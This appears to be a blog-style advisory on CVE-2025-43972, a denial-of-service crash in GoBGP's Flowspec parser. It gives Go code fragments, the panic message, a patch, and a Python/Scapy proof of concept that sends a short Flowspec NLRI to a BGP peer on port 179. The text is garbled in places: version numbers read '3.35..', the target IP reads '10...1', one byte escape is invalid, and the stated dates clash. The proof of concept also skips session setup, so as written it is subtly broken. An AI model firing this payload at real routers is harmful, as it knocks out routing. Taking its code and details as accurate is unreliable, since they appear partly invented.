CVE-2025-43972 - Crashing GoBGP Via Short Flowspec Packets

In June 2024, a critical issue was discovered in GoBGP, the popular BGP implementation written in Go. The vulnerability, now tracked as CVE-2025-43972, allows a remote attacker to cause GoBGP to crash by sending a specially crafted Flowspec NLRI packet. The flaw affects all GoBGP versions before 3.35..

Below, I’ll break down what this vulnerability is, how it works, show some code excerpts, and walk you through how an attacker could trigger the crash. This is an exclusive, plain-English read for operators, defenders, and network engineers.

What is GoBGP?

GoBGP is an open-source Border Gateway Protocol (BGP) implementation. It's widely used in cloud, SDN, and production networks for routing. With BGP extensions like Flowspec, GoBGP can do advanced traffic filtering and DDoS mitigation.

What’s Flowspec, and What's Broken?

Flowspec lets routers distribute traffic filters (like matching flows and specifying actions) via BGP.

The vulnerable code is in GoBGP's Flowspec parser. When GoBGP receives a Flowspec NLRI (Network Layer Reachability Information), it expects the packet to be at least 20 bytes long in a certain context.

If an attacker sends a shorter packet (less than 20 bytes), GoBGP tries to read past the end of the slice, causing it to crash with a panic.

The bug is in pkg/packet/bgp/bgp.go. Here’s an excerpt to illustrate the problem (simplified)

// Vulnerable flowspec parser fragment
func parseFlowSpecNLRI(data []byte) error {
    // Code assumes len(data) >= 20
    someValue := binary.BigEndian.Uint32(data[16:20]) // will panic if len(data) < 20
    // ...
    return nil
}

If data is less than 20 bytes, accessing data[16:20] causes a runtime panic

panic: runtime error: slice bounds out of range [16:20]

How Can This Crash Be Triggered?

Any BGP peer — even an untrusted one — can send a Flowspec message with a too-short NLRI. The application will immediately panic and exit.

Establish a BGP session (or exploit any network where GoBGP accepts untrusted connections).

2. Send a BGP UPDATE message with a Flowspec NLRI where the NLRI's payload is less than 20 bytes, e.g., just 10 bytes.

Here's a simple proof of concept in Python using Scapy

# PoC: Send short Flowspec NLRI to GoBGP BGP session
from scapy.all import *
from scapy.contrib.bgp import *

peer_ip = "10...1"
peer_port = 179

# Minimal BGP header + short Flowspec NLRI
bgp_update = BGPHeader(type=2)/BGPUpdate(
    path_attr=[BGPPathAttr(type=14, value=b'\x00\x01')],
    nlri=[BGPNLRI(b'\x01\x02\x03\x04\x05\x06\x07\x08\x09\xa')]  # only 10 bytes!
)

# Send the update (requires a real or test BGP session)
send(IP(dst=peer_ip)/TCP(dport=peer_port, sport=12345, flags='PA')/bgp_update)

> ⚠️ Real-world use would need a BGP session established. In test labs, this will instantly crash vulnerable GoBGP.

# Fix

The patch is in GoBGP v3.35.. Proper bounds checking was added:

func parseFlowSpecNLRI(data []byte) error {
    if len(data) < 20 {
        return fmt.Errorf("invalid NLRI: too short")
    }
    someValue := binary.BigEndian.Uint32(data[16:20])
    // ...
    return nil
}

References

- GoBGP Release v3.35.
- GoBGP Commit Fixing the Bug
- NVD CVE-2025-43972 (pending as of 2024-06)
- Flowspec RFC 5575

Exploit Impact: Remote, easy denial of service

Keep all routing daemons up-to-date. Always validate peer trust levels, and consider using filtering or automated upgrades. For those running GoBGP in production, patch without delay!

Stay safe & watch your network.

Timeline

Published on: 04/21/2025 01:15:45 UTC
Last modified on: 05/08/2025 15:54:12 UTC